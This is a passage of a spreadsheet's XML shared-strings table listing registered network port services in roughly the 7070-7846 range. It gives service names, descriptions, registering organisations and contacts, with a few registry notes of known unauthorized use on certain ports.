    <t>[iba_AG]</t>
  </si>
  <si>
    <t>[Alexander_Melamed]</t>
  </si>
  <si>
    <t>iba-cfg-disc</t>
  </si>
  <si>
    <t>martalk</t>
  </si>
  <si>
    <t>MarTalk protocol</t>
  </si>
  <si>
    <t>[Mahr_GmbH_GÃ¶ttingen]</t>
  </si>
  <si>
    <t>[Kevin_Bube]</t>
  </si>
  <si>
    <t>7074-7079</t>
  </si>
  <si>
    <t>empowerid</t>
  </si>
  <si>
    <t>EmpowerID Communication</t>
  </si>
  <si>
    <t>[Matthew_Whited]</t>
  </si>
  <si>
    <t>7081-7087</t>
  </si>
  <si>
    <t>zixi-transport</t>
  </si>
  <si>
    <t>Zixi live video transport protocol</t>
  </si>
  <si>
    <t>[Zixi]</t>
  </si>
  <si>
    <t>[Igor_Ratner]</t>
  </si>
  <si>
    <t>7089-7094</t>
  </si>
  <si>
    <t>jdp-disc</t>
  </si>
  <si>
    <t>Java Discovery Protocol</t>
  </si>
  <si>
    <t>[OpenJDK]</t>
  </si>
  <si>
    <t>[Florian_Weimer]</t>
  </si>
  <si>
    <t>7096-7098</t>
  </si>
  <si>
    <t>lazy-ptop</t>
  </si>
  <si>
    <t>[Guy_Keren]</t>
  </si>
  <si>
    <t>font-service</t>
  </si>
  <si>
    <t>X Font Service</t>
  </si>
  <si>
    <t>elcn</t>
  </si>
  <si>
    <t>Embedded Light Control Network</t>
  </si>
  <si>
    <t>[Michael_Scarito]</t>
  </si>
  <si>
    <t>7102-7106</t>
  </si>
  <si>
    <t>aes-x170</t>
  </si>
  <si>
    <t>AES-X170</t>
  </si>
  <si>
    <t>[Richard_Foss]</t>
  </si>
  <si>
    <t>7108-7116</t>
  </si>
  <si>
    <t>rothaga</t>
  </si>
  <si>
    <t>Encrypted chat and file transfer service</t>
  </si>
  <si>
    <t>[Arcadian_Computers]</t>
  </si>
  <si>
    <t>[Jonathan_Pollock]</t>
  </si>
  <si>
    <t>7118-7120</t>
  </si>
  <si>
    <t>virprot-lm</t>
  </si>
  <si>
    <t>Virtual Prototypes License Manager</t>
  </si>
  <si>
    <t>[Victor_Galis]</t>
  </si>
  <si>
    <t>7122-7127</t>
  </si>
  <si>
    <t>scenidm</t>
  </si>
  <si>
    <t>intelligent data manager</t>
  </si>
  <si>
    <t>[Paul_Ignatius]</t>
  </si>
  <si>
    <t>scenccs</t>
  </si>
  <si>
    <t>Catalog Content Search</t>
  </si>
  <si>
    <t>[Anil_Sharma]</t>
  </si>
  <si>
    <t>7130-7160</t>
  </si>
  <si>
    <t>cabsm-comm</t>
  </si>
  <si>
    <t>CA BSM Comm</t>
  </si>
  <si>
    <t>[Chun_Ho_Chang]</t>
  </si>
  <si>
    <t>caistoragemgr</t>
  </si>
  <si>
    <t>CA Storage Manager</t>
  </si>
  <si>
    <t>cacsambroker</t>
  </si>
  <si>
    <t>CA Connection Broker</t>
  </si>
  <si>
    <t>[David_Roberts]</t>
  </si>
  <si>
    <t>fsr</t>
  </si>
  <si>
    <t>File System Repository Agent</t>
  </si>
  <si>
    <t>[Micha_Ben_Efraim]</t>
  </si>
  <si>
    <t>doc-server</t>
  </si>
  <si>
    <t>Document WCF Server</t>
  </si>
  <si>
    <t>aruba-server</t>
  </si>
  <si>
    <t>Aruba eDiscovery Server</t>
  </si>
  <si>
    <t>casrmagent</t>
  </si>
  <si>
    <t>CA SRM Agent</t>
  </si>
  <si>
    <t>[Venkata_Krishna]</t>
  </si>
  <si>
    <t>cnckadserver</t>
  </si>
  <si>
    <t>cncKadServer DB &amp; Inventory Services</t>
  </si>
  <si>
    <t>[Micha_Ben_Efraim_2]</t>
  </si>
  <si>
    <t>ccag-pib</t>
  </si>
  <si>
    <t>Consequor Consulting Process Integration Bridge</t>
  </si>
  <si>
    <t>[Frank_Goenninger]</t>
  </si>
  <si>
    <t>nsrp</t>
  </si>
  <si>
    <t>Adaptive Name/Service Resolution</t>
  </si>
  <si>
    <t>[Geoff_Back_2]</t>
  </si>
  <si>
    <t>drm-production</t>
  </si>
  <si>
    <t>Discovery and Retention Mgt Production</t>
  </si>
  <si>
    <t>[Micha_Ben_Efraim_3]</t>
  </si>
  <si>
    <t>metalbend</t>
  </si>
  <si>
    <t>Port used for MetalBend programmable interface</t>
  </si>
  <si>
    <t>[Micha_Ben_Efraim_4]</t>
  </si>
  <si>
    <t>zsecure</t>
  </si>
  <si>
    <t>zSecure Server</t>
  </si>
  <si>
    <t>[Hans_Schoone]</t>
  </si>
  <si>
    <t>clutild</t>
  </si>
  <si>
    <t>Clutild</t>
  </si>
  <si>
    <t>[Cheryl_Stoutenburg]</t>
  </si>
  <si>
    <t>7175-7180</t>
  </si>
  <si>
    <t>janus-disc</t>
  </si>
  <si>
    <t>Janus Guidewire Enterprise Discovery Service Bus</t>
  </si>
  <si>
    <t>[Guidewire_Software_Inc]</t>
  </si>
  <si>
    <t>[Luca_Debiasi]</t>
  </si>
  <si>
    <t>7182-7199</t>
  </si>
  <si>
    <t>fodms</t>
  </si>
  <si>
    <t>FODMS FLIP</t>
  </si>
  <si>
    <t>[David_Anthony]</t>
  </si>
  <si>
    <t>dlip</t>
  </si>
  <si>
    <t>DLIP</t>
  </si>
  <si>
    <t>[Albert_Manfredi]</t>
  </si>
  <si>
    <t>pon-ictp</t>
  </si>
  <si>
    <t>Inter-Channel Termination Protocol (ICTP) for multi-wavelength PON
    (Passive Optical Network) systems</t>
  </si>
  <si>
    <t>[Broadband_Forum]</t>
  </si>
  <si>
    <t>[TR-352][Inter-Channel-Termination protocol (ICTP) is a peer-to-peer protocol with
      a binary message format that is used by a set of optical line terminal (OLT) channel terminations (CT) 
      comprising a 40-Gigabit-capable next-generation passive optical network (NG-PON2) system to
      exchange channel profile configuration and status information and to coordinate the operation of tunable 
      optical network units (ONUs) in a multi-wavelength channel environment.]</t>
  </si>
  <si>
    <t>7203-7214</t>
  </si>
  <si>
    <t>PS-Server</t>
  </si>
  <si>
    <t>Communication ports for PaperStream Server services</t>
  </si>
  <si>
    <t>[PFU_Systems_Inc.]</t>
  </si>
  <si>
    <t>[Hari_Asuri]</t>
  </si>
  <si>
    <t>PS-Capture-Pro</t>
  </si>
  <si>
    <t>PaperStream Capture Professional</t>
  </si>
  <si>
    <t>7217-7226</t>
  </si>
  <si>
    <t>ramp</t>
  </si>
  <si>
    <t>Registry A &amp; M Protocol</t>
  </si>
  <si>
    <t>[John_Havard]</t>
  </si>
  <si>
    <t>citrixupp</t>
  </si>
  <si>
    <t>Citrix Universal Printing Port</t>
  </si>
  <si>
    <t>[Gary_Barton]</t>
  </si>
  <si>
    <t>citrixuppg</t>
  </si>
  <si>
    <t>Citrix UPP Gateway</t>
  </si>
  <si>
    <t>7230-7234</t>
  </si>
  <si>
    <t>aspcoordination</t>
  </si>
  <si>
    <t>ASP Coordination Protocol</t>
  </si>
  <si>
    <t>[Wi-Fi_Alliance_2]</t>
  </si>
  <si>
    <t>[Mick_Conley]</t>
  </si>
  <si>
    <t>display</t>
  </si>
  <si>
    <t>Wi-Fi Alliance Wi-Fi Display Protocol</t>
  </si>
  <si>
    <t>[Wi-Fi_Alliance]</t>
  </si>
  <si>
    <t>[Thomas_Sciorilli]</t>
  </si>
  <si>
    <t>Defined TXT keys: _display.tcp. Display Protocol</t>
  </si>
  <si>
    <t>pads</t>
  </si>
  <si>
    <t>PADS (Public Area Display System) Server</t>
  </si>
  <si>
    <t>[Willie_Jan_Bons]</t>
  </si>
  <si>
    <t>7238-7243</t>
  </si>
  <si>
    <t>frc-hicp</t>
  </si>
  <si>
    <t>FrontRow Calypso Human Interface Control Protocol</t>
  </si>
  <si>
    <t>[Frontrow_Calypso_LLC]</t>
  </si>
  <si>
    <t>[Scott_Halberg]</t>
  </si>
  <si>
    <t>frc-hicp-disc</t>
  </si>
  <si>
    <t>7245-7261</t>
  </si>
  <si>
    <t>cnap</t>
  </si>
  <si>
    <t>Calypso Network Access Protocol</t>
  </si>
  <si>
    <t>7263-7271</t>
  </si>
  <si>
    <t>watchme-7272</t>
  </si>
  <si>
    <t>WatchMe Monitoring 7272</t>
  </si>
  <si>
    <t>[Oliver_Heinz]</t>
  </si>
  <si>
    <t>oma-rlp</t>
  </si>
  <si>
    <t>OMA Roaming Location</t>
  </si>
  <si>
    <t>[Larry_A_Young]</t>
  </si>
  <si>
    <t>oma-rlp-s</t>
  </si>
  <si>
    <t>OMA Roaming Location SEC</t>
  </si>
  <si>
    <t>oma-ulp</t>
  </si>
  <si>
    <t>OMA UserPlane Location</t>
  </si>
  <si>
    <t>[Larry_A_Young_2]</t>
  </si>
  <si>
    <t>oma-ilp</t>
  </si>
  <si>
    <t>OMA Internal Location Protocol</t>
  </si>
  <si>
    <t>[Khiem_Tran]</t>
  </si>
  <si>
    <t>oma-ilp-s</t>
  </si>
  <si>
    <t>OMA Internal Location Secure Protocol</t>
  </si>
  <si>
    <t>oma-dcdocbs</t>
  </si>
  <si>
    <t>OMA Dynamic Content Delivery over CBS</t>
  </si>
  <si>
    <t>[Avi_Primo]</t>
  </si>
  <si>
    <t>ctxlic</t>
  </si>
  <si>
    <t>Citrix Licensing</t>
  </si>
  <si>
    <t>[Marc_Binstock]</t>
  </si>
  <si>
    <t>itactionserver1</t>
  </si>
  <si>
    <t>ITACTIONSERVER 1</t>
  </si>
  <si>
    <t>[Brian_Taylor]</t>
  </si>
  <si>
    <t>itactionserver2</t>
  </si>
  <si>
    <t>ITACTIONSERVER 2</t>
  </si>
  <si>
    <t>mzca-action</t>
  </si>
  <si>
    <t>eventACTION/ussACTION (MZCA) server</t>
  </si>
  <si>
    <t>[Gord_Tomlin]</t>
  </si>
  <si>
    <t>mzca-alert</t>
  </si>
  <si>
    <t>eventACTION/ussACTION (MZCA) alert</t>
  </si>
  <si>
    <t>genstat</t>
  </si>
  <si>
    <t>General Statistics Rendezvous Protocol</t>
  </si>
  <si>
    <t>[VSN_International_Ltd]</t>
  </si>
  <si>
    <t>[Sean_D_SollÃ©]</t>
  </si>
  <si>
    <t>7284-7299</t>
  </si>
  <si>
    <t>swx</t>
  </si>
  <si>
    <t>7300-7359</t>
  </si>
  <si>
    <t>The Swiss Exchange</t>
  </si>
  <si>
    <t>[Edgar_Blum]</t>
  </si>
  <si>
    <t>7360-7364</t>
  </si>
  <si>
    <t>lcm-server</t>
  </si>
  <si>
    <t>LifeKeeper Communications</t>
  </si>
  <si>
    <t>[James_Bottomley]</t>
  </si>
  <si>
    <t>7366-7390</t>
  </si>
  <si>
    <t>mindfilesys</t>
  </si>
  <si>
    <t>mind-file system server</t>
  </si>
  <si>
    <t>[Dave_Porter]</t>
  </si>
  <si>
    <t>mrssrendezvous</t>
  </si>
  <si>
    <t>mrss-rendezvous server</t>
  </si>
  <si>
    <t>nfoldman</t>
  </si>
  <si>
    <t>nFoldMan Remote Publish</t>
  </si>
  <si>
    <t>[Richard_McDonald]</t>
  </si>
  <si>
    <t>fse</t>
  </si>
  <si>
    <t>File system export of backup images</t>
  </si>
  <si>
    <t>[Weibao_Wu]</t>
  </si>
  <si>
    <t>winqedit</t>
  </si>
  <si>
    <t>[David_Greer]</t>
  </si>
  <si>
    <t>hexarc</t>
  </si>
  <si>
    <t>Hexarc Command Language</t>
  </si>
  <si>
    <t>[George_Moromisato]</t>
  </si>
  <si>
    <t>7398-7399</t>
  </si>
  <si>
    <t>rtps-discovery</t>
  </si>
  <si>
    <t>RTPS Discovery</t>
  </si>
  <si>
    <t>[Gerardo_Pardo_Castel]</t>
  </si>
  <si>
    <t>rtps-dd-ut</t>
  </si>
  <si>
    <t>RTPS Data-Distribution User-Traffic</t>
  </si>
  <si>
    <t>rtps-dd-mt</t>
  </si>
  <si>
    <t>RTPS Data-Distribution Meta-Traffic</t>
  </si>
  <si>
    <t>7403-7409</t>
  </si>
  <si>
    <t>ionixnetmon</t>
  </si>
  <si>
    <t>Ionix Network Monitor</t>
  </si>
  <si>
    <t>[Maxime_Renaud]</t>
  </si>
  <si>
    <t>daqstream</t>
  </si>
  <si>
    <t>Streaming of measurement data</t>
  </si>
  <si>
    <t>[Hottinger_Baldwin_Messtechnik_GmbH]</t>
  </si>
  <si>
    <t>[Stephan_Gatzka]</t>
  </si>
  <si>
    <t>7412-7419</t>
  </si>
  <si>
    <t>ipluminary</t>
  </si>
  <si>
    <t>Multichannel real-time lighting control</t>
  </si>
  <si>
    <t>[Tristan_Seifert_3]</t>
  </si>
  <si>
    <t>mtportmon</t>
  </si>
  <si>
    <t>Matisse Port Monitor</t>
  </si>
  <si>
    <t>[Didier_Cabannes]</t>
  </si>
  <si>
    <t>7422-7425</t>
  </si>
  <si>
    <t>pmdmgr</t>
  </si>
  <si>
    <t>OpenView DM Postmaster Manager</t>
  </si>
  <si>
    <t>[Dave_Lamb]</t>
  </si>
  <si>
    <t>oveadmgr</t>
  </si>
  <si>
    <t>OpenView DM Event Agent Manager</t>
  </si>
  <si>
    <t>ovladmgr</t>
  </si>
  <si>
    <t>OpenView DM Log Agent Manager</t>
  </si>
  <si>
    <t>opi-sock</t>
  </si>
  <si>
    <t>OpenView DM rqt communication</t>
  </si>
  <si>
    <t>xmpv7</t>
  </si>
  <si>
    <t>OpenView DM xmpv7 api pipe</t>
  </si>
  <si>
    <t>pmd</t>
  </si>
  <si>
    <t>OpenView DM ovc/xmpv3 api pipe</t>
  </si>
  <si>
    <t>7432-7436</t>
  </si>
  <si>
    <t>faximum</t>
  </si>
  <si>
    <t>Faximum</t>
  </si>
  <si>
    <t>[George_Pajari]</t>
  </si>
  <si>
    <t>7438-7442</t>
  </si>
  <si>
    <t>oracleas-https</t>
  </si>
  <si>
    <t>Oracle Application Server HTTPS</t>
  </si>
  <si>
    <t>[David_McMarlin]</t>
  </si>
  <si>
    <t>7444-7470</t>
  </si>
  <si>
    <t>sttunnel</t>
  </si>
  <si>
    <t>Stateless Transport Tunneling Protocol</t>
  </si>
  <si>
    <t>[Bruce_Davie_3]</t>
  </si>
  <si>
    <t>rise</t>
  </si>
  <si>
    <t>Rise: The Vieneo Province</t>
  </si>
  <si>
    <t>[Jason_Reskin]</t>
  </si>
  <si>
    <t>neo4j</t>
  </si>
  <si>
    <t>Neo4j Graph Database</t>
  </si>
  <si>
    <t>[Neo_Technology_Inc]</t>
  </si>
  <si>
    <t>[Julian_Simpson]</t>
  </si>
  <si>
    <t>7475-7477</t>
  </si>
  <si>
    <t>openit</t>
  </si>
  <si>
    <t>IT Asset Management</t>
  </si>
  <si>
    <t>[OpeniT_Inc]</t>
  </si>
  <si>
    <t>[Monette_Maano]</t>
  </si>
  <si>
    <t>7479-7490</t>
  </si>
  <si>
    <t>telops-lmd</t>
  </si>
  <si>
    <t>[David_Spencer]</t>
  </si>
  <si>
    <t>7492-7499</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7499</t>
  </si>
  <si>
    <t>silhouette</t>
  </si>
  <si>
    <t>Silhouette User</t>
  </si>
  <si>
    <t>[Anthony_Payne]</t>
  </si>
  <si>
    <t>ovbus</t>
  </si>
  <si>
    <t>HP OpenView Bus Daemon</t>
  </si>
  <si>
    <t>[David_M_Rhodes]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7501</t>
  </si>
  <si>
    <t>7502-7507</t>
  </si>
  <si>
    <t>adcp</t>
  </si>
  <si>
    <t>Automation Device Configuration Protocol</t>
  </si>
  <si>
    <t>[Festo_AG]</t>
  </si>
  <si>
    <t>[Joerg_Ullmann]</t>
  </si>
  <si>
    <t>acplt</t>
  </si>
  <si>
    <t>ACPLT - process automation service</t>
  </si>
  <si>
    <t>[Chair_for_Process_Control_Engineering]</t>
  </si>
  <si>
    <t>[Ulrich_Epple]</t>
  </si>
  <si>
    <t>ovhpas</t>
  </si>
  <si>
    <t>HP OpenView Application Server</t>
  </si>
  <si>
    <t>[Jeff_Conrad]</t>
  </si>
  <si>
    <t>pafec-lm</t>
  </si>
  <si>
    <t>[Billy_Dhillon]</t>
  </si>
  <si>
    <t>7512-7541</t>
  </si>
  <si>
    <t>saratoga</t>
  </si>
  <si>
    <t>Saratoga Transfer Protocol</t>
  </si>
  <si>
    <t>[Lloyd_Wood]</t>
  </si>
  <si>
    <t>atul</t>
  </si>
  <si>
    <t>atul server</t>
  </si>
  <si>
    <t>[Mark_Stapp]</t>
  </si>
  <si>
    <t>nta-ds</t>
  </si>
  <si>
    <t>FlowAnalyzer DisplayServer</t>
  </si>
  <si>
    <t>[Fred_Messinger]</t>
  </si>
  <si>
    <t>nta-us</t>
  </si>
  <si>
    <t>FlowAnalyzer UtilityServer</t>
  </si>
  <si>
    <t>cfs</t>
  </si>
  <si>
    <t>Cisco Fabric service</t>
  </si>
  <si>
    <t>[Rituparna_Agrawal]</t>
  </si>
  <si>
    <t>cwmp</t>
  </si>
  <si>
    <t>Broadband Forum CWMP</t>
  </si>
  <si>
    <t>tidp</t>
  </si>
  <si>
    <t>Threat Information Distribution Protocol</t>
  </si>
  <si>
    <t>[Chui_Tin_Yen]</t>
  </si>
  <si>
    <t>nls-tl</t>
  </si>
  <si>
    <t>Network Layer Signaling Transport Layer</t>
  </si>
  <si>
    <t>[Melinda_Shore]</t>
  </si>
  <si>
    <t>cloudsignaling</t>
  </si>
  <si>
    <t>Cloud Signaling Service</t>
  </si>
  <si>
    <t>[Scott_Dawson]</t>
  </si>
  <si>
    <t>controlone-con</t>
  </si>
  <si>
    <t>ControlONE Console signaling</t>
  </si>
  <si>
    <t>[BYNE]</t>
  </si>
  <si>
    <t>[Andre_Nazario]</t>
  </si>
  <si>
    <t>7552-7559</t>
  </si>
  <si>
    <t>sncp</t>
  </si>
  <si>
    <t>Sniffer Command Protocol</t>
  </si>
  <si>
    <t>[Dominick_Cafarelli]</t>
  </si>
  <si>
    <t>7561-7562</t>
  </si>
  <si>
    <t>cfw</t>
  </si>
  <si>
    <t>Control Framework</t>
  </si>
  <si>
    <t>[RFC6230]</t>
  </si>
  <si>
    <t>7564-7565</t>
  </si>
  <si>
    <t>vsi-omega</t>
  </si>
  <si>
    <t>VSI Omega</t>
  </si>
  <si>
    <t>7567-7568</t>
  </si>
  <si>
    <t>dell-eql-asm</t>
  </si>
  <si>
    <t>Dell EqualLogic Host Group Management</t>
  </si>
  <si>
    <t>[James_E_King_III]</t>
  </si>
  <si>
    <t>aries-kfinder</t>
  </si>
  <si>
    <t>Aries Kfinder</t>
  </si>
  <si>
    <t>[James_King_III]</t>
  </si>
  <si>
    <t>7571-7573</t>
  </si>
  <si>
    <t>coherence</t>
  </si>
  <si>
    <t>Oracle Coherence Cluster Service</t>
  </si>
  <si>
    <t>[Oracle_5]</t>
  </si>
  <si>
    <t>[Mark_Falco]</t>
  </si>
  <si>
    <t>coherence-disc</t>
  </si>
  <si>
    <t>Oracle Coherence Cluster discovery service</t>
  </si>
  <si>
    <t>7575-7587</t>
  </si>
  <si>
    <t>sun-lm</t>
  </si>
  <si>
    <t>Sun License Manager</t>
  </si>
  <si>
    <t>[Sophie_Deng]</t>
  </si>
  <si>
    <t>7589-7605</t>
  </si>
  <si>
    <t>mipi-debug</t>
  </si>
  <si>
    <t>MIPI Alliance Debug</t>
  </si>
  <si>
    <t>[MIPI_Alliance]</t>
  </si>
  <si>
    <t>[Peter_Lefkin]</t>
  </si>
  <si>
    <t>7607-7623</t>
  </si>
  <si>
    <t>indi</t>
  </si>
  <si>
    <t>Instrument Neutral Distributed Interface</t>
  </si>
  <si>
    <t>[Elwood_Downey]</t>
  </si>
  <si>
    <t>simco</t>
  </si>
  <si>
    <t>SImple Middlebox COnfiguration (SIMCO) Server</t>
  </si>
  <si>
    <t>[RFC4540]</t>
  </si>
  <si>
    <t>SImple Middlebox COnfiguration (SIMCO)</t>
  </si>
  <si>
    <t>[Sebastian_Kiesel]</t>
  </si>
  <si>
    <t>soap-http</t>
  </si>
  <si>
    <t>SOAP Service Port</t>
  </si>
  <si>
    <t>[Donald_Dylla]</t>
  </si>
  <si>
    <t>zen-pawn</t>
  </si>
  <si>
    <t>Primary Agent Work Notification</t>
  </si>
  <si>
    <t>xdas</t>
  </si>
  <si>
    <t>OpenXDAS Wire Protocol</t>
  </si>
  <si>
    <t>[John_Calcote_2]</t>
  </si>
  <si>
    <t>hawk</t>
  </si>
  <si>
    <t>HA Web Konsole</t>
  </si>
  <si>
    <t>[Tim_Serong]</t>
  </si>
  <si>
    <t>tesla-sys-msg</t>
  </si>
  <si>
    <t>TESLA System Messaging</t>
  </si>
  <si>
    <t>[Andy_Perreault]</t>
  </si>
  <si>
    <t>pmdfmgt</t>
  </si>
  <si>
    <t>PMDF Management</t>
  </si>
  <si>
    <t>[Hunter_Goatley]</t>
  </si>
  <si>
    <t>7634-7647</t>
  </si>
  <si>
    <t>cuseeme</t>
  </si>
  <si>
    <t>bonjour-cuseeme</t>
  </si>
  <si>
    <t>[Marc_Manthey]</t>
  </si>
  <si>
    <t>7649-7662</t>
  </si>
  <si>
    <t>rome</t>
  </si>
  <si>
    <t>Proprietary immutable distributed data storage</t>
  </si>
  <si>
    <t>[TFOR]</t>
  </si>
  <si>
    <t>[David_von_Vistauxx]</t>
  </si>
  <si>
    <t>7664-7671</t>
  </si>
  <si>
    <t>imqstomp</t>
  </si>
  <si>
    <t>iMQ STOMP Server</t>
  </si>
  <si>
    <t>[Amy_Kang]</t>
  </si>
  <si>
    <t>imqstomps</t>
  </si>
  <si>
    <t>iMQ STOMP Server over SSL</t>
  </si>
  <si>
    <t>imqtunnels</t>
  </si>
  <si>
    <t>iMQ SSL tunnel</t>
  </si>
  <si>
    <t>[Shailesh_S_Bavadeka]</t>
  </si>
  <si>
    <t>imqtunnel</t>
  </si>
  <si>
    <t>iMQ Tunnel</t>
  </si>
  <si>
    <t>imqbrokerd</t>
  </si>
  <si>
    <t>iMQ Broker Rendezvous</t>
  </si>
  <si>
    <t>[Joseph_Di_Pol]</t>
  </si>
  <si>
    <t>sun-user-https</t>
  </si>
  <si>
    <t>Sun App Server - HTTPS</t>
  </si>
  <si>
    <t>7678-7679</t>
  </si>
  <si>
    <t>pando-pub</t>
  </si>
  <si>
    <t>Pando Media Public Distribution</t>
  </si>
  <si>
    <t>[Laird_Popkin]</t>
  </si>
  <si>
    <t>7681-7682</t>
  </si>
  <si>
    <t>dmt</t>
  </si>
  <si>
    <t>Cleondris DMT</t>
  </si>
  <si>
    <t>[Cleondris_GmbH]</t>
  </si>
  <si>
    <t>[Christian_Plattner]</t>
  </si>
  <si>
    <t>7684-7686</t>
  </si>
  <si>
    <t>bolt</t>
  </si>
  <si>
    <t>Bolt database connection</t>
  </si>
  <si>
    <t>collaber</t>
  </si>
  <si>
    <t>Collaber Network Service</t>
  </si>
  <si>
    <t>[Rajesh_Akkineni]</t>
  </si>
  <si>
    <t>7690-7696</t>
  </si>
  <si>
    <t>klio</t>
  </si>
  <si>
    <t>KLIO communications</t>
  </si>
  <si>
    <t>[Helmut_Giritzer_2]</t>
  </si>
  <si>
    <t>7698-7699</t>
  </si>
  <si>
    <t>em7-secom</t>
  </si>
  <si>
    <t>EM7 Secure Communications</t>
  </si>
  <si>
    <t>[Christopher_Cordray]</t>
  </si>
  <si>
    <t>nfapi</t>
  </si>
  <si>
    <t>SCF nFAPI defining MAC/PHY split</t>
  </si>
  <si>
    <t>[Small_Cell_Forum]</t>
  </si>
  <si>
    <t>[Richard_Kennedy]</t>
  </si>
  <si>
    <t>7702-7706</t>
  </si>
  <si>
    <t>sync-em7</t>
  </si>
  <si>
    <t>EM7 Dynamic Updates</t>
  </si>
  <si>
    <t>scinet</t>
  </si>
  <si>
    <t>scientia.net</t>
  </si>
  <si>
    <t>[Christoph_Anton_Mitt]</t>
  </si>
  <si>
    <t>7709-7719</t>
  </si>
  <si>
    <t>medimageportal</t>
  </si>
  <si>
    <t>MedImage Portal</t>
  </si>
  <si>
    <t>[Robert_Helton]</t>
  </si>
  <si>
    <t>7721-7723</t>
  </si>
  <si>
    <t>nsdeepfreezectl</t>
  </si>
  <si>
    <t>Novell Snap-in Deep Freeze Control</t>
  </si>
  <si>
    <t>[David_Crowe]</t>
  </si>
  <si>
    <t>nitrogen</t>
  </si>
  <si>
    <t>Nitrogen Service</t>
  </si>
  <si>
    <t>[Randy_Lomnes]</t>
  </si>
  <si>
    <t>freezexservice</t>
  </si>
  <si>
    <t>FreezeX Console Service</t>
  </si>
  <si>
    <t>trident-data</t>
  </si>
  <si>
    <t>Trident Systems Data</t>
  </si>
  <si>
    <t>[Jeremy_McClintock]</t>
  </si>
  <si>
    <t>osvr</t>
  </si>
  <si>
    <t>Open-Source Virtual Reality</t>
  </si>
  <si>
    <t>[Open_Source_Virtual_Reality_OSVR.com]</t>
  </si>
  <si>
    <t>[Yuval_Boger_2]</t>
  </si>
  <si>
    <t>7729-7733</t>
  </si>
  <si>
    <t>smip</t>
  </si>
  <si>
    <t>Smith Protocol over IP</t>
  </si>
  <si>
    <t>[Jim_Pettinato]</t>
  </si>
  <si>
    <t>7735-7737</t>
  </si>
  <si>
    <t>aiagent</t>
  </si>
  <si>
    <t>HP Enterprise Discovery Agent</t>
  </si>
  <si>
    <t>[Matthew_Darwin]</t>
  </si>
  <si>
    <t>7739-7740</t>
  </si>
  <si>
    <t>scriptview</t>
  </si>
  <si>
    <t>ScriptView Network</t>
  </si>
  <si>
    <t>[Reinhard_Wolf]</t>
  </si>
  <si>
    <t>msss</t>
  </si>
  <si>
    <t>Mugginsoft Script Server Service</t>
  </si>
  <si>
    <t>[Jonathan_Mitchell]</t>
  </si>
  <si>
    <t>sstp-1</t>
  </si>
  <si>
    <t>Sakura Script Transfer Protocol</t>
  </si>
  <si>
    <t>[Kouichi_Takeda]</t>
  </si>
  <si>
    <t>raqmon-pdu</t>
  </si>
  <si>
    <t>RAQMON PDU</t>
  </si>
  <si>
    <t>[RFC4712]</t>
  </si>
  <si>
    <t>7745-7746</t>
  </si>
  <si>
    <t>prgp</t>
  </si>
  <si>
    <t>Put/Run/Get Protocol</t>
  </si>
  <si>
    <t>[Jayasooriah]</t>
  </si>
  <si>
    <t>7748-7776</t>
  </si>
  <si>
    <t>inetfs</t>
  </si>
  <si>
    <t>A File System using TLS over a wide area network</t>
  </si>
  <si>
    <t>[Roger_Allan]</t>
  </si>
  <si>
    <t>cbt</t>
  </si>
  <si>
    <t>[Tony_Ballardie]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7777</t>
  </si>
  <si>
    <t>interwise</t>
  </si>
  <si>
    <t>Interwise</t>
  </si>
  <si>
    <t>[Joseph_Gray]</t>
  </si>
  <si>
    <t>vstat</t>
  </si>
  <si>
    <t>VSTAT</t>
  </si>
  <si>
    <t>[Vinh_Nguyn]</t>
  </si>
  <si>
    <t>accu-lmgr</t>
  </si>
  <si>
    <t>[Moises_E_Hernandez]</t>
  </si>
  <si>
    <t>7782-7783</t>
  </si>
  <si>
    <t>s-bfd</t>
  </si>
  <si>
    <t>Seamless Bidirectional Forwarding Detection (S-BFD)</t>
  </si>
  <si>
    <t>[RFC7881]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7785</t>
  </si>
  <si>
    <t>minivend</t>
  </si>
  <si>
    <t>MINIVEND</t>
  </si>
  <si>
    <t>[Mike_Heins]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7786</t>
  </si>
  <si>
    <t>popup-reminders</t>
  </si>
  <si>
    <t>Popup Reminders Receive</t>
  </si>
  <si>
    <t>[Robert_Harvey]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7787</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7788</t>
  </si>
  <si>
    <t>office-tools</t>
  </si>
  <si>
    <t>Office Tools Pro Receive</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 7789</t>
  </si>
  <si>
    <t>7790-7793</t>
  </si>
  <si>
    <t>q3ade</t>
  </si>
  <si>
    <t>Q3ADE Cluster Service</t>
  </si>
  <si>
    <t>[Uffe_Harksen]</t>
  </si>
  <si>
    <t>7795-7796</t>
  </si>
  <si>
    <t>pnet-conn</t>
  </si>
  <si>
    <t>Propel Connector port</t>
  </si>
  <si>
    <t>pnet-enc</t>
  </si>
  <si>
    <t>Propel Encoder port</t>
  </si>
  <si>
    <t>[Leif_Hedstrom]</t>
  </si>
  <si>
    <t>altbsdp</t>
  </si>
  <si>
    <t>Alternate BSDP Service</t>
  </si>
  <si>
    <t>[Dieter_Siegmund]</t>
  </si>
  <si>
    <t>asr</t>
  </si>
  <si>
    <t>Apple Software Restore</t>
  </si>
  <si>
    <t>[Jim_Kateley][Shantonu_Sen]</t>
  </si>
  <si>
    <t>Defined TXT keys: image=&lt;HTTP URL of disk image&gt;</t>
  </si>
  <si>
    <t>ssp-client</t>
  </si>
  <si>
    <t>Secure Server Protocol - client</t>
  </si>
  <si>
    <t>[Rick_Macchio]</t>
  </si>
  <si>
    <t>vns-tp</t>
  </si>
  <si>
    <t>Virtualized Network Services Tunnel Protocol</t>
  </si>
  <si>
    <t>[Juniper_Networks]</t>
  </si>
  <si>
    <t>[Bruno_Rijsman]</t>
  </si>
  <si>
    <t>7803-7809</t>
  </si>
  <si>
    <t>rbt-wanopt</t>
  </si>
  <si>
    <t>Riverbed WAN Optimization Protocol</t>
  </si>
  <si>
    <t>[Vladimir_Legalov_2]</t>
  </si>
  <si>
    <t>7811-7844</t>
  </si>
  <si>
    <t>apc-7845</t>
  </si>
  <si>
    <t>APC 7845</t>
  </si>
  <si>
    <t>apc-7846</t>
  </si>
  <si>
    <t>APC 7846</t>
  </si>
  <si>
    <t>csoauth</t>
  </si>
  <si>
    <t>A product key authentication protocol made by CSO</t>
  </si>
  <si>
    <t>[Jeff_Wamsley]</t>
  </si>
  <si>
    <t>[Jacob_Kiesel]</t>
  </si>
  <si>
